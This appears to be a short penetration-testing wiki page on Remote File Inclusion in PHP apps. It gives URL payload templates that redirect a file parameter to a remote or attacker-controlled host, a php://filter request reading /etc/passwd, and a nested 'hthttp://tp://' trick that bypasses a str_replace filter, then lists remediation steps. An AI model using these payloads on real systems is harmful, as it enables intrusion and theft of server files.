Remote File Inclusion

Also known as RFI, an attacker can redirect actions to or from another server.

Here we find a typical process for leveraging this vulnerability:

Redirect actions of a server via URL parameters

#It's searching for a file
http://$url/$query?$param=hola.php
#We can do a redirection to another site
http://$url/$query?$param=http://$url
#Or a redirection to a local server
http://$url/$query?$param=//$myip

Sometimes, we will need to check the page code to see the input conditions

We find that the code is blocking the connection through the HTTP protocol

Example source code

...
$file = str_replace( array( "http://", "https://" ), "", $file );
...

In this case, we can try to use another connection protocol

http://$url/$query?$param=php://filter/resource=/etc/passwd

Also if we use hthttp://tp:// the code will do the replacement and leave us anyway with http://, and we will also bypass this verification

http://$url/$query?$param=hthttp://tp://$url

Remediation Actions

Disable remote file inclusion features in language/platform for example, set allow_url_include = Off in PHP configuration
Avoid including files based on user input to construct, include, or require path
Validate user input against a strict whitelist of known safe file names or identifiers
Use static file paths instead of dynamically generating them from input
Sanitize input by allowing only expected characters like alphanumeric only, no dots, slashes, or protocols
Ensure proper file path resolution and canonicalize the path

PreviousLocal File Inclusion NextCross-Site Scripting

Last updated 1 month ago